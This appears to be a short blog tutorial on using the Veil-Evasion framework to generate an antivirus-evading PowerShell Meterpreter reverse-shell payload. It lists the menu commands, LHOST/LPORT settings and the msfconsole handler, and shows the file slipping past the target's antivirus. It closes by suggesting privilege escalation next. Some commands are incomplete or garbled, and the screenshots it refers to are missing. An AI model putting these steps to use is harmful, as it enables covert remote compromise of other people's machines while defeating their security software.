Touch The Technology

Cyber Security

Bypass Antiviruses with Veil Framework

During pentesting, the target machine/machines may be protected by Antivirus softwares. You’d have to bypass these softwares and open a shell. The tool that’s necessary for this kind of job is under the Veil roof, called veil-evasion. Softwares like this bypass antiviruses with different encoding methods.


git clone veil
cd veil/setup
After the setup, run the “” file under the veil directory.
On the screen above, you can see that there are 51 payloads available. For the payload list you should use the command below.

As you can see above, there are payloads available to build with C, C#, GO, Python, Ruby, Powershell programming languages. We’ll choose the 24th payload. Just like in metasploit, you can either type “use Payload_Name” or just type the number of the payload.

[menu>>]: use powershell/meterpreter/rev_tcp
[menu>>]: use 24

We chose the payload. Now we enter the ip and port information using “set” command

 [powershell/meterpreter/rev_tcp>>]: set LHOST
 [powershell/meterpreter/rev_tcp>>]: set LPORT 54321

After we enter the ip and port information, we can get more information about the payload by typing “info” command.

After we fill in the required spaces, we create the malware by typing the “generate” command.

 [powershell/meterpreter/rev_tcp>>]: generate

On the screen you see, it asks us for the name of the output file. The default name is “payload”

Malware is under the “/usr/share/veil-output/source/” directory and it comes with a msf script if we want to make our job easier. The msf script is under the “/usr/share/veil-output/handlers/” directory.

To use it:

 root@ruger:~# msfconsole -r handler_name.rc

Time to test it!

When we send the malware to the target, it starts a security scan, as you can see

(The text on the bottom of the window is in in Turkish. It says “running security scan”)

But it cant detect the malware. Hooray 😀

(Text on the bottom of the window says “kotuyumbenkotuyum.bat has been downloaded successfully.”)

When we run the malware, it connects right away.

And we’re in!

After this part is limited to your imagination. The next thing to do is upgrading your authority on the target device 😉


Your email address will not be published. Required fields are marked *

Melisa Ayşe Demirel | Author - Translator